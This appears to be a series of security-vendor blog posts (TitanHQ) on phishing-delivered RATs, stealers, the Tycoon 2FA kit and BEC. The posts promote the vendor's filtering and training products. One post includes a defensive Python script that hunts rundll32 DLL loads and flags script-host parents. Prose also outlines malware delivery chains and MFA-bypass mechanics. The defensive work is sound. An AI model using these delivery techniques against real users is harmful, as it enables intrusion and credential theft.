After attacks such as this, additional security awareness training is provided to the workforce to raise awareness of the threat from phishing; however, the provision of comprehensive training regularly throughout the year will go a long way toward ensuring that attacks such as this do not succeed and that if they do, the resultant data breach is far less severe.

TitanHQ’s SafeTitan security awareness training platform allows organizations to conduct comprehensive training continuously, and since each training module is a maximum of 10 minutes, it is easy to fit the training into busy workflows. The training platform has a huge range of content, covering a broad range of threats, and when programs are run continuously and employees complete a few training modules a month, susceptibility to phishing drops considerably, especially when the SafeTitan phishing simulator is also used. The simulator includes templates taken from recent real-world phishing campaigns. If a user responds to one of these simulations, they are immediately told where they went wrong and are required to complete a training module relevant to that threat.

End-user security awareness training is an important part of your cybersecurity arsenal, but it is also vital to block as many phishing emails as possible. TitanHQ’s SpamTitan email security is an advanced, AI and machine learning-driven anti-spam solution that blocks more than 99.9% of spam email and phishing threats. The solution includes twin antivirus engines for blocking known malware, and sandboxing for blocking zero-day threats, and is a highly effective spam filter for Office 365. With SafeTitan security awareness training and an advanced Microsoft 365 spam filter from TitanHQ, businesses will be well protected from phishing threats.

All TitanHQ solutions are intuitive, easy to use, and can be set up in just a few minutes and are available on a free trial to allow you to test them out for yourself before making a purchase decision. Independent reviews from genuine users of TitanHQ solutions show SpamTitan is much loved by users. On G2 reviews, SpamTitan is consistently given 5-star reviews by end users, who rate it the best spam filter for Outlook due to its effectiveness, low cost, ease of use, and the excellent customer service from the TitanHQ team.

SafeTitan and SpamTitan are available on a free trial to allow you to test them out for yourself before making a purchase decision. Give the TitanHQ team a call today to take the first step toward improving your phishing defenses.

Remcos RAT Now Distributed in Spam Email Using VHD Attachments

Cybercriminals are constantly evolving their tactics for delivering malware, and one of the most recent changes concerns the Remcos RAT. Remcos was developed by Breaking Security as a legitimate remote administration tool that can be used for network maintenance, system monitoring, surveillance, and penetration testing; however, the tool has been weaponized to create the Remcos Remote Access Trojan (RAT).

The Remcos RAT has extensive capabilities and has been used by cybercriminals since 2016. The malware allows threat actors to take control of systems and maintain persistent, highly privileged remote access. The malware can be used for a range of purposes, with threat actors commonly using it for credential theft, man-in-the-middle interception of internet connections, and to create botnets of infected devices that can be used for distributed denial of service (DDoS) attacks.

The Remcos RAT is distributed in spam email campaigns. Since 2016, the most common method for distributing the malware has been spam emails with malicious Office attachments. Social engineering techniques were used to trick users into opening the files and enabling macros; however, campaigns have recently been detected that deliver the malware via weaponized virtual hard disk (VHD) files.

Security awareness training often focuses on teaching users to be careful when opening Office files and other file types commonly associated with malware distribution. The change to a more unusual file type could result in the file being opened, and VHD files are less likely to be identified as malicious by email security solutions.

An analysis of the extracted VHD files revealed a shortcut file that contained a PowerShell command line that executed a malicious script that ultimately delivered the Remcos RAT via a sophisticated multi-stage delivery method designed to evade security solutions. Once installed, the malware can log keystrokes, take screenshots, and exfiltrate data to its command-and-control server. The malware also has mass-mailer capabilities and can send copies of itself via email from an infected device. According to Check Point, the Remcos RAT rose to the 4th most prevalent malware threat in March 2024.

The constantly changing tactics for distributing malware mean network defenders need cybersecurity solutions that can adapt and detect zero-day threats. SpamTitan is an advanced email filtering service with AI and machine learning-driven threat detection which is capable of identifying and blocking novel phishing and malware distribution methods. The machine learning algorithm uses predictive technology to identify previously unseen attacks, emails are scanned using twin antivirus engines, and suspicious file types are sent to a next-generation sandbox for behavioral analysis, ensuring even previously unseen malware variants can be identified and blocked.

SpamTitan scans all inbound emails and also includes an outbound email filter to identify malicious emails that are sent from compromised email accounts and by malicious insiders. SpamTitan also has data loss protection capabilities, allowing IT teams to detect and block internal data loss. If your corporate email filter does not include advanced threat protection including AI-driven detection and sandboxing, or if you rely on Microsoft’s anti-spam and anti-phishing protection, sophisticated threats such as zero-day attacks are unlikely to be blocked and your business will be at risk.

Give the TitanHQ team a call today to find out more about SpamTitan. SpamTitan is delivered as a cloud-based anti-spam service that integrates seamlessly with Microsoft 365 to improve protection, or as a gateway solution for on-premises protection, which can be installed on existing hardware as a virtual anti-spam appliance.

Phishing Attempts Increase 40% in a Year

Cybercriminals use a variety of methods for initial access to victims’ networks and tactics are constantly changing. Ransomware groups are increasingly targeting boundary devices such as routers, firewalls, and the virtual private networks that sit between the Internet and business networks, with the first quarter of this year seeing a decline in attacks exploiting vulnerabilities for initial access. According to the ransomware remediation firm Coveware, remote access is now favored by ransomware groups. In Q1, 2024, Remote Desktop Protocol (RDP) compromise was the most commonly identified initial attack vector.

Phishing is still commonly used for initial access, although there has been a fall in phishing-based attacks by ransomware groups; however, it is common for ransomware groups to chain email phishing with RDP compromise and the exploitation of software vulnerabilities for more impactful attacks. What is clear from the data is that threat actors are conducting more sophisticated attacks and are taking steps to cover their tracks. Coveware reports that the initial access vector was unknown in around 45% of attacks.

While ransomware groups may be concentrating on non-email attack vectors, phishing attempts by cybercriminals have increased significantly over the past year. A new analysis by researchers at the antivirus company Kaspersky found that phishing attempts increased by 40% in 2023, with threat actors increasingly using messaging apps such as Telegram in their attacks as well as social media networks.

Phishing is also becoming more sophisticated and increasingly personalized. There is growing evidence that threat actors are using generative artificial intelligence engines to craft new lures to use in their campaigns, especially spear phishing attacks. The near-perfect messages that GenAI creates can make it difficult for end users to distinguish phishing emails from genuine communications.

The problem for many businesses is threat actors are constantly evolving their tactics and are conducting increasingly sophisticated campaigns, yet email security defenses are not maintaining pace. Many Microsoft 365 users find that while Microsoft Defender and EOP block a good percentage of spam emails and many phishing threats, more sophisticated threats are not detected. Having a cybersecurity solution such as PhishTitan augments Microsoft 365 defenses and ensures sophisticated threats are blocked. For every 80,000 emails received, PhishTitan catches 20 unique and sophisticated phishing attacks that Microsoft’s expensive E5 premium security misses.

PhishTitan helps with post-delivery remediation, allowing security teams to rapidly remove phishing threats from the email system when a threat is reported, adds a banner to emails warning users about suspicious messages, and rewrites URLs to show the true destination to combat spoofing. The solution also includes time-of-click protection to combat phishing links that are weaponized after delivery, and AI- & LLM-driven anti-phishing analysis to identify previously unseen phishing threats.

The use of malware in email campaigns is also increasing. In 2023, 6.06 billion malware attacks were identified worldwide, up 10% from the previous year, with loaders, information stealers, and remote access trojans (RATs) the most common malware threats. While signature-based detection mechanisms once served businesses well, the rate at which new malware variants are released means many threats are not detected as malware signatures have yet to be uploaded to antivirus defenses. The key to blocking these zero-day threats is email sandboxing.

An email sandbox is an isolated environment where messages that meet certain criteria are sent after scans by antivirus engines have shown the messages to be free from malware. In the sandbox, messages are subjected to deep inspection to identify malware from its behavior rather than signature. Many malware variants have been developed to resist analysis or pass sandbox checks, such as delaying malicious actions for a set period. A slight disadvantage of email sandboxing is a small delay in email delivery, but it is important to ensure that messages are analyzed in detail and anti-sandboxing capabilities are defeated. There are, however, ways to get sandbox protection while minimizing the impact on the business.

Whether you are looking for a gateway spam filter or a hosted spam filter to improve protection against email threats or advanced phishing protection, TitanHQ can help. Give the team a call today for detailed information on TitanHQ products and advice on the most effective solutions to meet the needs of your business. You can take advantage of the free trials of TitanHQ products, which are provided with full support to help you get the most out of the trial.

Financial Institutions Targeted in Phishing Campaign That Delivers the JSOutProx RAT

A phishing campaign has been running since late March that tricks people into installing a new version of the remote access trojan, JSOutProx. JSOutProx was first identified in 2019 and is a backdoor that utilizes JavaScript and .NET that allows users to run shell commands, execute files, take screenshots, control peripheral devices, and download additional malware payloads. The malware is known to be used by a threat actor tracked as Solar Spider, which mostly targets financial institutions in Central Europe, South Asia, Southeast Asia, and Africa, with the latest version of the malware also being used to target organizations in the Middle East.

The malware has mostly been used on banks and other financial institutions. If infected, the malware collects information about its environment and the attackers then download any of around 14 different plug-ins from either GitHub or GitLab, based on the information the malware collects about its operating environment. The malware can be used to control proxy settings, access Microsoft Outlook account details, capture clipboard content, and steal one-time passwords from Symantec VIP.

Like many other remote access trojans, JSOutProx is primarily delivered via phishing emails. A variety of lures have been used in the phishing emails but the latest campaign uses fake notifications about SWIFT payments in targeted attacks on financial institutions and MoneyGram payment notifications in attacks on individuals, which aim to trick the recipients into installing the malware.

The latest campaign uses JavaScript attachments that masquerade as PDF files of financial documents contained in .zip files. If the user attempts to open the fake PDF file, the JavaScript is executed, deploying the malware payload. The main aim of the campaign is to steal user account credentials, gather sensitive financial documents, and obtain payment account data, which can either be used to make fraudulent transactions or be sold to other threat actors on the dark web. Email accounts are often compromised, which can be leveraged in Business Email Compromise (BEC) attacks to steal funds from clients. According to VISA, “The JSOutProx malware poses a serious threat to financial institutions around the world, and especially those in the AP region as those entities have been more frequently targeted with this malware.”

Since phishing is the main method of malware delivery, the best defense against attacks is advanced anti-spam software and end-user security awareness training. JSOutProx malware is able to bypass many traditional anti-spam solutions and anti-virus software due to the high level of obfuscation. The best defense is an anti-spam solution with AI and machine learning capabilities that can identify the signs of malicious emails by analyzing message headers and message content to determine how they deviate from the emails typically received by the business and also search for the signs of phishing and malware delivery based on the latest threat intelligence.

To identify the malicious attachments, an anti-spam solution requires sandboxing. Any messages that pass standard antivirus checks are sent to the sandbox, where behavior is analyzed to identify malicious actions rather than relying on malware signatures for detection. SpamTitan can extract and analyze files in compressed archives such as .zip and .rar files, and in recent independent tests, SpamTitan achieved a phishing catch rate of 99.914% and a malware catch rate of 99.511%, with a false positive rate of 0.00%. SpamTitan from TitanHQ is delivered as either a hosted anti-spam service or an anti-spam gateway that is installed on-premises on existing hardware. SpamTitan has been developed to be easy to implement and use and to meet the needs of businesses of all sizes and managed service providers.

Phishing emails target employees so it is important to teach them how to identify phishing emails. Due to the fast-changing threat landscape, security awareness training should be provided continuously to the workforce, and phishing simulations should be conducted to give employees practice at identifying threats. SafeTitan from TitanHQ can be used to easily create effective training programs that run continuously throughout the year and keep employees up to date on the latest threats and tactics, techniques, and procedures used by malicious actors. SafeTitan also delivers relevant training in real-time in response to security mistakes and phishing simulation failures. Check out these anti-spam tips for further information on improving your defenses against phishing and get in touch with TitanHQ for more information on SpamTitan email security and the SafeTitan security awareness training platform.

Monthly Salary Reports Used as Lure in RAT-delivering Phishing Campaign

One of the most effective ways of getting employees to open malicious emails is to make the emails appear to have been sent internally and to use a lure related to salaries, as is the case with a recently identified campaign that is used to deliver a Remote Access Trojan called NetSupport RAT.

The campaign was first identified by researchers at Perception Point, who intercepted an email that appeared to have been sent by the accounts department and purported to be a monthly salary report. The recipient is told to review the report and get back in touch with the accounts department if they have any questions or concerns about the data. Due to the sensitive nature of the data, the salary chart is in a password-protected document, and the employee is told to enter the password provided in the email if the enable editing option is unavailable. The user is prompted to download the .docx file, enter the password, and then click enable editing, after which they need to click on the image of a printer embedded in the document. Doing so will display the user’s salary graph.

The document uses an OLE (Object Linking and Embedding) template which is a legitimate tool that allows linking to documents and other objects, in this case, a malicious script that is executed by clicking on the printer icon. This method of infection is highly effective, as the malicious payload is not contained in the document itself, so standard antivirus scans of the document will not reveal any malicious content. If the user clicks the printer icon, a ZIP archive file will be opened that includes a single Windows shortcut file, which is a PowerShell dropper that will deliver the NetSupport RAT from the specified URL and execute it, also adding a registry key for persistence.

NetSupport RAT has been developed from a legitimate remote desktop tool called NetSupport Manager which is typically used to provide remote technical support and IT assistance. The malware allows a threat actor to gain persistent remote access to an infected device, gather data from the endpoint, and run commands. While the use of OLE template manipulation is not new, this method has not previously been used to deliver the NetSupport RAT via email.

The threat actor uses encrypted documents to deliver the malware to evade email security solutions, and the emails are sent using a legitimate email marketing platform called Brevo, which allows the emails to pass standard reputation checks. This campaign is another example of how threat actors are increasing the sophistication of their phishing campaigns and how they can bypass standard email security defenses, including Microsoft’s anti-malware and anti-phishing protections for Microsoft 365 environments.

While the lure and the steps users are taken through are reasonable, there are red flags at various stages of the infection process where end users should identify the email as potentially malicious. In order for that to happen, end users should be provided with regular security awareness training. TitanHQ offers a comprehensive security awareness training platform called SafeTitan, which includes training modules to teach employees how to identify the red flags in email campaigns such as this. The platform also includes a phishing simulator that allows these types of emails to be sent to employees to test the effectiveness of their training. If they fail a simulation, they are immediately shown where they missed the opportunity to identify the threat, with relevant training generated instantly in real time.

Sophisticated phishing attacks require sophisticated anti-phishing defenses to block these emails before they reach end users’ inboxes. While standard antivirus checks can block many malicious payloads, behavioral analysis of attachments and files is essential. TitanHQ’s cloud-based anti-spam service – SpamTitan – performs a barrage of front-end checks on messages, including reputation checks and Bayesian analysis; machine-learning algorithms analyze messages for potentially malicious and phishing content; attachments are scanned with twin antivirus engines; and messages are sent to a sandbox for deep analysis. In the sandbox, malicious behavior can be identified, allowing even sophisticated phishing emails to be blocked by the cloud spam filter.

A hosted email filter is often the best fit for businesses, although SpamTitan is available as a gateway spam filter. The TitanHQ team will be happy to listen to your requirements and suggest the best option to meet your needs. Give the team a call today to find out more about improving your email defenses against sophisticated phishing and malware distribution campaigns and how to provide more effective security awareness training.

Sophisticated Phishing Campaign Delivers RATs via SVG File Attachments

A sophisticated phishing campaign has been detected that is being used to deliver a variety of Remote Access Trojan (RAT) malware, including Venom RAT, Remcos RAT, and NanoCore RAT, as well as a stealer that targets cryptocurrency wallets. The campaign uses email as the initial access vector with the messages purporting to be an invoice for a shipment that has recently been delivered. The emails include a Scalable Vector Graphics (SVG) file attachment – an increasingly common XML-based vector image format.

If the file is executed, it will drop a compressed (zip) file on the user’s device. The zip file contains a batch file that has been created with an obfuscation tool (most likely BatCloak) to allow it to evade anti-virus software. If not detected as malicious, a ScrubCrypt batch file is unpacked – another tool used to bypass antivirus protections – which delivers two executable files that are used to deliver and execute the RAT and establish persistence. This method of delivery allows the malware to evade AMSI (Antimalware Scan Interface) and ETW (Event Tracing for Windows) antivirus protections.

One of the primary payloads is Venom RAT, which establishes a connection with its command and control (C2) server, transmits sensitive information gathered from the compromised device, and runs commands from its C2 server. Venom RAT can download additional modules and malware payloads, including a stealer malware that targets folders associated with cryptocurrency wallets and applications including Atomic Wallet, Electrum, Exodus, Foxmail, and Telegram.

The sophisticated nature of this campaign and the obfuscation used to hide the malicious payloads from traditional antivirus software demonstrates the need for advanced email defenses and end-user training. Email security solutions that rely on malware signatures are easily bypassed, which is why it is important to use an anti-spam solution that incorporates sandboxing for blocking malware and AI and machine learning capabilities to identify malicious emails.

SpamTitan uses AI and machine learning algorithms to detect phishing emails that other solutions miss – including Microsoft’s basic and advanced anti-phishing mechanisms for Microsoft 365. SpamTitan includes Sender Policy Framework (SPF), SURBLs, RBLs, Bayesian analysis, and more, and the machine learning algorithms can detect email messages that deviate from the typical messages received by a business and can identify header anomalies, address spoofing, and suspect email body content. All inbound messages are subjected to standard and advanced malware checks, including scans using twin anti-virus engines and email sandboxing. If all anti-malware checks are passed, including unpacking and analyzing compressed files, messages are sent to the sandbox for behavioral analysis.

In the cloud-based sandbox, malicious actions are identified such as attempts to deliver additional files as is commonly seen in multi-stage attacks and C2 calls. In recent independent tests (Virus Bulletin), SpamTitan achieved a phishing catch rate of 99.914%, a malware catch rate of 99.511%, and a false positive rate of 0.00%. With phishing attacks becoming more sophisticated you need to have sophisticated defenses. With email security protection provided by SpamTitan and security awareness training delivered using TitanHQ’s award-winning SafeTitan security awareness training and phishing simulation platform you will be well protected from email-based attacks.

Give the TitanHQ team a call today to find out more about how you can improve your defenses against email-based attacks with sandboxing technology and how to add more layers to your defenses to block the full range of cyberattacks.

Stealthy Latrodectus Malware Increasingly Used for Initial Access to Networks

A relatively new malware variant dubbed Latrodectus is increasingly being used to gain initial access to business networks. Latrodectus is the Latin name for widow spiders, but the malware was so named because of a line in the code that mentions the word. The malware was first detected in November 2023, and detections have been increasing ever since, especially since February 2024. Analyses of Latrodectus malware have revealed strong similarities with the IcedID remote access trojan (RAT) and malware loader, and the infrastructure that supports the malware was previously used in IcedID campaigns. That strongly suggests that Latrodectus malware is the successor of IcedID and was most likely developed by the same threat actor.

Latrodectus malware is primarily a malware downloader and backdoor that is used to deliver a range of different payloads and execute commands on an infected device. Latrodectus is a modular malware capable of adapting to different environments, has extensive capabilities, is stealthy, and can bypass many cybersecurity solutions. The malware checks for the presence of debuggers, has anti-sandbox capabilities, and encrypts communications with its C2 server. The malware gains persistence via auto-run keys and scheduled tasks.

Latrodectus malware is believed to be used by highly capable threat actors that specialize in gaining initial access to networks to sell on to other threat actors such as ransomware groups. The malware is primarily distributed in phishing emails, with the detected emails so far using Microsoft Azure and Cloudflare-themed lures, with either PDF file attachments or URLs embedded in emails. The malware has also been identified as being distributed via contact form spam.

If the PDF files are opened, the user is told that the document has been uploaded to the Microsoft Azure Cloud and they are required to download it. The user is then directed to a fake Cloudflare security check that adds legitimacy but also prevents email security solutions from following the link and prevents in-depth analysis in sandboxes. If the user proceeds, they will download a JavaScript file that appears to be the document indicated in the PDF file. If the file is executed, a script runs that downloads an MSI installer, which drops and executes the Latrodectus DLL.

Due to the evasive capabilities of the malware, standard email security solutions are unlikely to identify the phishing emails as malicious, and even email sandboxing checks may be passed. An advanced anti-spam service is required that incorporates AI and machine learning capabilities to identify the malicious nature of the email. SpamTitan Plus is an advanced email security solution with the highest coverage of anti-phishing feeds of any product on the market, incorporating coverage of 100% of all current market-leading anti-phishing feeds. The superior threat intelligence fed into the system and massive clickstream traffic from more than 600 million users and endpoints ensure the URLs used to deliver malware are detected and blocked. The machine learning capabilities of SpamTitan Plus allow the solution to predict and block novel phishing campaigns, including phishing attacks that use personalized URLs when targeting individuals. URLs are followed and are rewritten to identify the destination, and the solution features time-of-click protection to identify and block URLs that are weaponized after delivery.

As an additional protection, businesses should consider a web filtering solution. WebTitan from TitanHQ protects against the web-based component of cyberattacks. While SpamTitan Plus can block attempts to visit URLs embedded in emails and email attachments, WebTitan will block visits to URLs from general web browsing, redirects from malvertising, and non-email communications. WebTitan can also be configured to block downloads of files from the Internet associated with malware – JavaScript files for instance.

End-user training is also important to teach cybersecurity best practices and eliminate risky behaviors. SafeTitan is a comprehensive security awareness training platform with hundreds of training modules that can be easily configured to create and automate training courses relevant to individuals and user groups. The platform includes a phishing simulator for conducting realistic phishing simulations, using messages that have been created from genuine phishing attacks. The platform is the only behavior-driven security awareness training platform that delivers training in real time in response to simulation failures and security mistakes.

As cyber threats increase in sophistication, multiple cybersecurity solutions are required to provide multi-layered protection. TitanHQ solutions will ensure you are well protected from ever-changing cyber threats and sophisticated phishing and malware attacks.

TitanHQ Achieves Virus Bulletin VBSpam+ Certification with 99.91% Phishing Catch Rate in Latest Tests

TitanHQ has claimed a Top 3 position in a recent Virus Bulletin email security test, achieving an exceptional 99.98% spam catch rate and 99.91% phishing catch rate for the cutting-edge filtering engine that powers the SpamTitan (email security) and PhishTitan (phishing protection) solutions, earning TitanHQ the prestigious VBSpam+ certification for the products.

Virus Bulletin is a security information portal and independent testing and certification body that has earned a formidable reputation within the cybersecurity community for providing security professionals with intelligence about the latest developments in the global threat landscape. Virus Bulletin conducts regular tests of security solutions to determine how well they perform at detecting and blocking threats, and for more than 20 years has been benchmarking cybersecurity solutions. Virus Bulletin’s public certifications cover all types of security threat protection, including anti-spam and anti-phishing solutions for enterprises.

In the Q1, 2024 tests, Virus Bulletin assessed nine comprehensive email security solutions, including TitanHQ’s email security suite which comprises SpamTitan and PhishTitan. The email security solutions were put to the test to assess how effective they are at blocking unsolicited and unwanted spam emails and malicious messages of all types. TitanHQ’s solutions achieved exceptional scores at blocking spam and phishing emails, with a spam catch rate of 99.983%, a malware catch rate of 99.511%, and a phishing catch rate of 99.914% with zero false positives. The final score for the Q1, 2024 tests was 99.983, cementing TitanHQ’s position as a leading provider of anti-phishing and anti-spam solutions for managed service providers and businesses.

“This test reaffirms TitanHQ’s unrivaled prowess in spam and phishing protection—we stand as the first choice for combating phishing attempts and spam infiltrations,” said Ronan Kavanagh, CEO at TitanHQ. “Our customers need not settle for anything less. With TitanHQ solutions, they receive unparalleled defense against phishing and spam and experience minimal false positives.”

While there are many ways that cybercriminals and nation-state actors breach company networks and gain access to sensitive data, phishing is the leading initial access vector. Despite phishing being such a prevalent threat, many businesses lack security solutions that can consistently identify and block these malicious messages, which results in costly compromises, data breaches, and devastating ransomware attacks. According to one study by researchers at CoreView on 1.6 million Microsoft 365 users, 90% lacked essential security protections that can combat threats such as phishing.

While Microsoft has security solutions that can block spam and phishing emails, they are unable to block advanced phishing threats. PhishTitan has been developed to work seamlessly with M365 and catch the phishing threats that M365 misses. Even Microsoft’s most advanced anti-phishing protection, the costly E5 premium security offering, fails to block many advanced threats. Testing has shown that for every 80,000 emails received, PhishTitan identifies and blocks 20 unique, sophisticated phishing attempts that Microsoft’s top solution misses, and many businesses cannot afford Microsoft’s top level of protection and are reliant on its basic anti-spam and anti-phishing protection.

If you want to improve your defenses against phishing and malware and block more spam emails, give the TitanHQ team a call and ask about SpamTitan and PhishTitan. Both email filtering solutions are available on a free trial, so you can put them to the test and see for yourself the difference they make.

Large-scale StrelaStealer Malware Campaign Spreads to US and Europe

A phishing campaign distributing StrelaStealer malware has expanded to Europe and the United States, with the attackers favoring the high-tech, finance, professional and legal services, manufacturing, government, energy, utilities, insurance, and construction sectors.

StrelaStealer malware was first identified in November 2022. Its primary purpose is to extract email account login credentials from popular email clients such as Microsoft Outlook and Mozilla Thunderbird and exfiltrate them to its command-and-control server. StrelaStealer was previously used to target companies in Spanish-speaking countries; targeting has now expanded to the United States and Europe, with attacks peaking in November 2023 and January 2024 at more than 500 attacks a day on companies in the United States and more than 100 attacks per day in Europe, according to tracking data from Palo Alto Networks’ Unit 42 team.

The campaign uses email as the initial access vector, with the emails typically claiming to be an invoice. Early attacks used ISO file attachments containing a .lnk shortcut and an HTML file; the shortcut invoked rundll32.exe to execute the malware payload. The latest attacks use a different method, favoring .zip attachments. These archives contain JScript files which, if executed, drop a batch file and a base64-encoded file; the batch file decodes the latter into a DLL, which is executed with rundll32.exe to deploy the StrelaStealer payload. The constant across both variants is a rundll32.exe process loading a DLL from a user-writable or removable location, which is a useful detection anchor.
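Both delivery paths end with rundll32.exe loading a DLL from somewhere it has no business being, and that is a reliable hunting signal in endpoint telemetry. The following Python is an added example, not code from Unit 42 or TitanHQ: it scores constructed process-start events (the Image, CommandLine and ParentImage fields a Sysmon Event ID 1 record carries) for a rundll32 module outside the Windows and Program Files trees, a non-.dll module extension, or a script host or shell as the parent. The file names, the D: drive letter standing in for a mounted ISO, and the export name are all made up.

```python
"""Flag rundll32.exe launches matching the StrelaStealer delivery chain.

Added example; not Unit 42's or TitanHQ's code. Events are constructed to mimic
Sysmon Event ID 1 / EDR process-start records; paths and export names are made up.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    image: str          # full path of the new process
    command_line: str
    parent_image: str   # full path of the parent process


# rundll32 <module>[,<export>]: the module path may be quoted if it contains spaces
RUNDLL_ARG = re.compile(
    r'rundll32(?:\.exe)?"?\s+(?:"(?P<quoted>[^"]+)"|(?P<bare>[^\s,]+))'
    r'(?:\s*,\s*(?P<export>\S+))?',
    re.IGNORECASE,
)
# Modules that rundll32 legitimately loads live under these roots
SYSTEM_DIRS = re.compile(r"^[a-z]:\\(windows|program files(?: \(x86\))?)\\", re.IGNORECASE)
# Parents that show a script or batch file is driving the launch (the JScript variant)
SCRIPT_PARENTS = {"wscript.exe", "cscript.exe", "cmd.exe", "powershell.exe", "mshta.exe"}


def basename(path: str) -> str:
    return path.strip('"').rsplit("\\", 1)[-1].lower()


def rundll32_module(command_line: str):
    """Return (module path, export name) from a rundll32 command line, or (None, None)."""
    m = RUNDLL_ARG.search(command_line)
    if not m:
        return None, None
    return (m.group("quoted") or m.group("bare")), m.group("export")


def assess(ev: ProcessEvent) -> list:
    """Reasons this process start looks like StrelaStealer-style DLL loading via rundll32."""
    reasons = []
    if basename(ev.image) != "rundll32.exe":
        return reasons
    module, _export = rundll32_module(ev.command_line)
    if module is None:
        return reasons
    if not SYSTEM_DIRS.match(module):
        # covers %TEMP%/AppData (JScript variant) and a mounted ISO drive (.lnk variant)
        reasons.append(f"module loaded from outside system directories: {module}")
    if not module.lower().endswith(".dll"):
        reasons.append("module does not carry a .dll extension")
    parent = basename(ev.parent_image)
    if parent in SCRIPT_PARENTS:
        reasons.append(f"launched by script host or shell: {parent}")
    return reasons


def hunt(events) -> dict:
    """Map event index -> reasons for every event that raised at least one reason."""
    return {i: r for i, ev in enumerate(events) if (r := assess(ev))}


# Constructed sample telemetry (not real campaign data)
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\rundll32.exe",
                 r'"C:\Windows\System32\rundll32.exe" C:\Windows\System32\shell32.dll,Control_RunDLL',
                 r"C:\Windows\explorer.exe"),                       # benign Control Panel launch
    ProcessEvent(r"C:\Windows\System32\rundll32.exe",
                 r"rundll32.exe C:\Users\alice\AppData\Local\Temp\3f2a91.dll,entry",
                 r"C:\Windows\System32\cmd.exe"),                   # batch file from the JScript stage
    ProcessEvent(r"C:\Windows\System32\rundll32.exe",
                 r"rundll32.exe D:\invoice.dll,entry",
                 r"C:\Windows\explorer.exe"),                       # .lnk inside a mounted ISO (D:)
    ProcessEvent(r"C:\Windows\SysWOW64\rundll32.exe",
                 r'rundll32 "C:\Users\bob\Downloads\Invoice 2024.dat",entry',
                 r"C:\Windows\System32\wscript.exe"),               # quoted path, non-.dll extension
]

if __name__ == "__main__":
    for i, reasons in hunt(SAMPLE_EVENTS).items():
        print(i, SAMPLE_EVENTS[i].command_line, reasons)
```

The benign Control Panel launch raises nothing, while the three malicious shapes each raise at least one reason; in a SIEM the same three checks map directly onto process-creation events, and a module path on a non-fixed drive is worth its own alert.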

Email sandboxing provides a vital layer of protection against malware that is difficult to detect with traditional signature-based email security. Anti-virus engines are generally signature-based, which means they can only detect known malware. Advanced email security solutions add sandboxing, which analyzes the behavior of files to identify and block novel malware: suspicious files are detonated in the sandbox for in-depth behavioral analysis. The control-flow obfuscation used in this attack can make analysis difficult even in a sandbox, as excessively long code blocks can cause timeouts in some sandboxed environments, and a sandbox that treats a timeout as a clean verdict will let the sample through. Sandboxing delays email delivery, which is far from ideal for businesses that need to act on emails quickly, but it is important to allow enough time for attachments to be fully analyzed, as StrelaStealer clearly demonstrates. The easiest way for businesses to sandbox email attachments is with SpamTitan Email Security.

StrelaStealer malware is actively evolving, and new methods are being developed to deliver it and evade security solutions. Combating sophisticated phishing attacks such as this requires a defense-in-depth approach, using multiple security solutions that provide overlapping layers of protection, such as SpamTitan Email Security, PhishTitan phishing protection, and SafeTitan security awareness training. Give the TitanHQ team a call today for more information on affordable cybersecurity solutions that are easy to use and capable of blocking advanced phishing threats.

Tycoon 2FA Phishing Kit Targets M365 and Gmail Credentials and Bypasses MFA

Phishing is one of the most common methods of obtaining credentials; however, businesses are increasingly implementing multi-factor authentication (MFA), which adds an extra layer of protection and means stolen credentials cannot be used on their own to gain access to accounts: an additional authentication factor is required before access is granted. While any form of MFA is better than none, MFA does not protect against all phishing attacks. Several popular phishing-as-a-service (PhaaS) platforms, including LabHost, Greatness, and Robin Banks, can steal credentials and defeat MFA. For a relatively small fee, any cybercriminal looking to compromise accounts can use such a platform to gain access to MFA-protected accounts.

A relatively new PhaaS platform, dubbed Tycoon 2FA, has been growing in popularity since its discovery in October 2023 and has been causing concern in the cybersecurity community. It is offered through private Telegram groups. Like many other PhaaS platforms, Tycoon 2FA uses adversary-in-the-middle (AiTM) tactics to capture the session token issued once MFA has been completed, allowing the attacker to access the account. The phishing kit uses at least 1,100 domains and has been used in thousands of phishing attacks.

Like most phishing attacks, initial contact is made with end users via email. The messages include a malicious link or a QR code. QR codes are popular with phishers because the URL is embedded in an image rather than in the message text, so filters that only parse links miss it, while the user’s phone decodes it without difficulty. After clicking the link or scanning the QR code, the user must pass a security challenge (Cloudflare Turnstile) before the phishing content loads; the challenge is there to keep automated URL scanners and security crawlers from reaching the page, not to protect the user. The page targets Microsoft 365 or Gmail credentials. The user’s email address is captured and used to prefill the login page; when the user enters their password it is captured, and they are directed to a fake MFA page.

The phishing kit runs a reverse proxy that relays the user’s credentials to the legitimate service in real time and captures the session cookie once the MFA challenge is passed. The user is unlikely to recognize that their account has been compromised, as they are redirected to a legitimate-looking page once MFA is passed. According to the researchers, many different threat actors have been using the kit, with the Tycoon 2FA operators having received almost $395,000 in payments to their Bitcoin wallet as of March 2024. At $120 for 10 days of usage, that total shows how popular the platform is with cybercriminals.

PhaaS platforms allow cybercriminals to conduct sophisticated attacks and bypass MFA without investing time and money in their own infrastructure, which significantly lowers the entry barrier for MFA-bypassing phishing attacks. An advanced spam filtering service such as SpamTitan Plus helps prevent malicious emails from reaching inboxes and is an ideal spam filter for MSPs looking to provide the best level of protection for their clients. The SpamTitan suite of email security solutions combines phishing, spam, and antivirus filtering, and independent tests show a spam block rate of 99.983% and a malware block rate of 99.511%.

PhishTitan from TitanHQ greatly improves protection against more advanced phishing campaigns such as those that use QR codes. Employees should be provided with regular security awareness training to help them identify and avoid phishing messages, and businesses should move to phishing-resistant MFA (FIDO2/WebAuthn security keys or passkeys) rather than basic two-factor authentication based on SMS codes, one-time passwords, or push approvals, all of which an AiTM kit such as Tycoon 2FA relays or captures without difficulty.

U.S. Government Entities Impersonated in Business Email Compromise Attacks

Business Email Compromise (BEC) attacks may not be encountered as frequently as phishing attacks, but the losses are far greater. According to figures from the Federal Bureau of Investigation (FBI) Internet Crime Complaint Center (IC3), $2.9 billion was lost to BEC attacks in 2023, making it the second most expensive type of cybercrime.

BEC attacks usually involve impersonation, with the attacker posing as a trusted individual. Contact is established and the scammer tricks the victim into divulging sensitive company information or transferring a large sum of money. For instance, the scammer may pose as a contractor and request that bank details are changed for an upcoming payment. The scam is not usually detected until after the transfer has been made and the funds have been withdrawn from the attacker-controlled account.

BEC attacks can be difficult for email security solutions to identify, as the emails are often sent from a known and trusted email account that has been compromised in a phishing attack. BEC scammers research their targets and may have access to past conversations between the victim and the person they are impersonating, so they can reference those conversations to convince the target that they are who they claim to be. The scams may also be spread across multiple emails, with trust built up over the exchange.

